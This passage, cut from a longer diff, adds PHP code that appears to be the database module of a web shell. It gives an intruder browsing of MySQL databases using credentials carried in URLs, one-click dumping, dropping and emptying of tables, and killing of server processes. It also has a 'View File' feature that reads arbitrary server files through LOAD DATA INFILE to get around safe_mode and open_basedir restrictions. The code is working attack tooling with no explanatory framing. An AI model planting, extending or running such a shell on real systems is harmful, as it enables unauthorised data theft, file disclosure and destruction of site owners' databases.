valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left 
panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." 
LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" 
name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td 
width="30%" height="1"></td></tr></table><?php
+ if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+ if ($sql_act == "newtbl")
+ {
+ echo "<b>";
+ if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+ }
+ else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+ }
+ elseif ($sql_act == "dump")
+ {
+ if (empty($submit))
+ {
+ $diplay = FALSE;
+ echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+ echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+ $v = join (";",$dmptbls);
+ echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+ if ($dump_file) {$tmp = $dump_file;}
+ else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+ echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+ echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+ echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+ 
echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+ echo "</form>";
+ }
+ else
+ {
+ $diplay = TRUE;
+ $set = array();
+ $set["sock"] = $sql_sock;
+ $set["db"] = $sql_db;
+ $dump_out = "download";
+ $set["print"] = 0;
+ $set["nl2br"] = 0;
+ $set[""] = 0;
+ $set["file"] = $dump_file;
+ $set["add_drop"] = TRUE;
+ $set["onlytabs"] = array();
+ if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+ $ret = mysql_dump($set);
+ if ($sql_dump_download)
+ {
+ @ob_clean();
+ header("Content-type: application/octet-stream");
+ header("Content-length: ".strlen($ret));
+ header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+ echo $ret;
+ exit;
+ }
+ elseif ($sql_dump_savetofile)
+ {
+ $fp = fopen($sql_dump_file,"w");
+ if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+ else
+ {
+ fwrite($fp,$ret);
+ fclose($fp);
+ echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+ }
+ }
+ else {echo "<b>Dump: nothing to do!</b>";}
+ }
+ }
+ if ($diplay)
+ {
+ if (!empty($sql_tbl))
+ {
+ if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+ $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+ $count_row = mysql_fetch_array($count);
+ mysql_free_result($count);
+ $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+ $tbl_struct_fields = array();
+ while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+ if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+ if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+ if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+ if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+ $perpage = $sql_tbl_le - $sql_tbl_ls;
+ if (!is_numeric($perpage)) {$perpage = 10;}
+ $numpages = $count_row[0]/$perpage;
+ $e = explode(" ",$sql_order);
+ if (count($e) == 2)
+ {
+ if ($e[0] == "d") 
{$asc_desc = "DESC";}
+ else {$asc_desc = "ASC";}
+ $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+ }
+ else {$v = "";}
+ $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+ $result = mysql_query($query) or print(mysql_smarterror());
+ echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+ echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+ echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+ echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+ echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+ if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+ if ($sql_tbl_act == "insert")
+ {
+ if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+ if (!empty($sql_tbl_insert_radio))
+ {
+
+ }
+ else
+ {
+ echo "<br><br><b>Inserting row into table:</b><br>";
+ if (!empty($sql_tbl_insert_q))
+ {
+ $sql_query = "SELECT * FROM `".$sql_tbl."`";
+ $sql_query .= " WHERE".$sql_tbl_insert_q;
+ $sql_query .= " LIMIT 1;";
+ $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+ $values = mysql_fetch_assoc($result);
+ mysql_free_result($result);
+ }
+ else {$values = array();}
+ echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+ foreach ($tbl_struct_fields as $field)
+ {
+ $name = $field["Field"];
+ if (empty($sql_tbl_insert_q)) {$v = "";}
+ echo 
"<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+ $i++;
+ }
+ echo "</table><br>";
+ echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+ if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+ echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+ }
+ }
+ if ($sql_tbl_act == "browse")
+ {
+ $sql_tbl_ls = abs($sql_tbl_ls);
+ $sql_tbl_le = abs($sql_tbl_le);
+ echo "<hr size=\"1\" noshade>";
+ echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+ $b = 0;
+ for($i=0;$i<$numpages;$i++)
+ {
+ if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a 
href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+ echo $i;
+ if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+ if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+ else {echo "&nbsp;";}
+ }
+ if ($i == 0) {echo "empty";}
+ echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+ echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+ echo "<tr>";
+ echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+ for ($i=0;$i<mysql_num_fields($result);$i++)
+ {
+ $v = mysql_field_name($result,$i);
+ if ($e[0] == "a") {$s = "d"; $m = "asc";}
+ else {$s = "a"; $m = "desc";}
+ echo "<td>";
+ if (empty($e[0])) {$e[0] = "a";}
+ if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+ else {echo "<b>".$v."</b><a 
href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+ echo "</td>";
+ }
+ echo "<td><font color=\"green\"><b>Action</b></font></td>";
+ echo "</tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+ {
+ echo "<tr>";
+ $w = "";
+ $i = 0;
+ foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+ if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+ echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+ $i = 0;
+ foreach ($row as $k=>$v)
+ {
+ $v = htmlspecialchars($v);
+ if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+ echo "<td>".$v."</td>";
+ $i++;
+ }
+ echo "<td>";
+ echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." 
LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+ echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+ echo "</td>";
+ echo "</tr>";
+ }
+ mysql_free_result($result);
+ echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+ echo "<option value=\"\">With selected:</option>";
+ echo "<option value=\"deleterow\">Delete</option>";
+ echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+ }
+ }
+ else
+ {
+ $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+ if (!$result) {echo mysql_smarterror();}
+ else
+ {
+ echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+ $i = 0;
+ $tsize = $trows = 0;
+ while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+ {
+ $tsize += $row["Data_length"];
+ $trows += $row["Rows"];
+ $size = view_size($row["Data_length"]);
+ echo "<tr>";
+ echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+ echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+ echo "<td>".$row["Rows"]."</td>";
+ echo "<td>".$row["Type"]."</td>";
+ echo "<td>".$row["Create_time"]."</td>";
+ echo "<td>".$row["Update_time"]."</td>";
+ echo "<td>".$size."</td>";
+ echo "<td>&nbsp;<a 
href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+ echo "</tr>";
+ $i++;
+ }
+ echo "<tr bgcolor=\"000000\">";
+ echo "<td><center><b>»</b></center></td>";
+ echo "<td><center><b>".$i." table(s)</b></center></td>";
+ echo "<td><b>".$trows."</b></td>";
+ echo "<td>".$row[1]."</td>";
+ echo "<td>".$row[10]."</td>";
+ echo "<td>".$row[11]."</td>";
+ echo "<td><b>".view_size($tsize)."</b></td>";
+ echo "<td></td>";
+ echo "</tr>";
+ echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+ echo "<option value=\"\">With selected:</option>";
+ echo "<option value=\"tbldrop\">Drop</option>";
+ echo "<option value=\"tblempty\">Empty</option>";
+ echo "<option value=\"tbldump\">Dump</option>";
+ echo "<option value=\"tblcheck\">Check table</option>";
+ echo "<option value=\"tbloptimize\">Optimize table</option>";
+ echo "<option value=\"tblrepair\">Repair table</option>";
+ echo "<option value=\"tblanalyze\">Analyze table</option>";
+ echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+ mysql_free_result($result);
+ }
+ }
+ }
+ }
+ }
+ else
+ {
+ $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+ if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" 
name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+ if (!empty($sql_act))
+ {
+ echo "<hr size=\"1\" noshade>";
+ if ($sql_act == "newdb")
+ {
+ echo "<b>";
+ if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+ else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+ }
+ if ($sql_act == "serverstatus")
+ {
+ $result = mysql_query("SHOW STATUS", $sql_sock);
+ echo "<center><b>Server-status variables:</b><br><br>";
+ echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 
border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+ echo "</table></center>";
+ mysql_free_result($result);
+ }
+ if ($sql_act == "servervars")
+ {
+ $result = mysql_query("SHOW VARIABLES", $sql_sock);
+ echo "<center><b>Server variables:</b><br><br>";
+ echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+ echo "</table>";
+ mysql_free_result($result);
+ }
+ if ($sql_act == "processes")
+ {
+ if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+ $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+ echo "<center><b>Processes:</b><br><br>";
+ echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+ echo "</table>";
+ mysql_free_result($result);
+ }
+ if ($sql_act == "getfile")
+ {
+ $tmpdb = $sql_login."_tmpdb";
+ $select = mysql_select_db($tmpdb);
+ if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+ if ($select)
+ {
+ $created = FALSE;
+ mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+ 
mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+ $result = mysql_query("SELECT * FROM tmp_file;");
+ if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+ else
+ {
+ for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+ $f = "";
+ while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+ if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+ else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+ mysql_free_result($result);
